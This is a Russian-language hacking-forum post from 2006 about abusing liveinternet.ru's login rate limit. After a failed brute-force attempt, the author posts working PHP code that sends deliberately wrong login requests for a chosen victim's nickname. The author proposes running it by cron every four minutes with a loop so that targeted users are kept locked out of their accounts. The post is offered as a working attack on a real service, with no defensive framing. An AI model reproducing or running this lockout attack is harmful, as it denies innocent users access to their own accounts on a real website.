ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
Перезагрузить страницу дизаблим юзеров лайвинтернета или неудавшийся брут акков
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

дизаблим юзеров лайвинтернета или неудавшийся брут акков
  #1  
Старый 17.09.2006, 18:42
Аватар для Talisman
Talisman
Постоянный
Регистрация: 22.04.2006
Сообщений: 566
Провел на форуме:
1325772

Репутация: 517


Отправить сообщение для Talisman с помощью ICQ
По умолчанию дизаблим юзеров лайвинтернета или неудавшийся брут акков
.:: Дизабл юзеров лайвинтернета или неудавшийся брут акков ::.

В письме, приходящим после регистрации на проекте приходит интересный код:
Цитата:
Для входа свой дневник в качестве его хозяина нажмите на ссылку
http://www.liveinternet.ru/journal_login.php?nick=ЛОГИН&password=ПАРОЛЬ
т.е. скрипт ловит параметры и гетом.
Но после 5 попыток в тячении 5-ти минут нас обламывают:
Цитата:
Внимание!

За 5 минут вы более 5 раз авторизовались неверно. Очередная попытка авторизации будет вам доступна через 296 секунд
хм... обыдно
смена айпи не помогла - нас продолжают посылать лесом брут не получился, но зато получился следующий пшп-код:
PHP код:
<?
set_time_limit(0);
Error_Reporting(E_ALL & ~E_NOTICE);

$request  "GET /journal_login.php?nick=Жертва&password=Лажа HTTP/1.1\r\n";
$request .= "Host: www.liveinternet.ru \r\n";
$request .= "User-Agent: Opera 7.50";
$request .= "Connection: close\r\n";
$request .= "Referer: http://liveinternet.ru/ \r\n\r\n";

$fp fsockopen('www.liveinternet.ru','80'$errno$errstr30);
if (!$fp
{
   echo "$errstr ($errno)<br />\n";

else 
{
   fwrite($fp$request);  
}
echo 'done )';
?>
теперь никто не мешает натравить на скрипт крон, чтобы запускать его каждые 4 минуты (меньше чем 290 секунд, на которые нас любезно посылают), добавить цикл, чтобы скрипт отправлял 5 неверных попыток и давить ни в чем не повинных юзеров )
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PSalm69 Избранное 248 27.10.2009 04:52
Хакеры и кракеры или "Что такое хорошо и что такое плохо?" foreva Чужие Статьи 12 09.02.2008 12:26
Права потребителя мобильника novichok Сотовый фрикинг 1 25.03.2006 20:58
иммет ли пров право сканить машины узеров? donetsk Болталка 29 24.03.2006 01:50



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ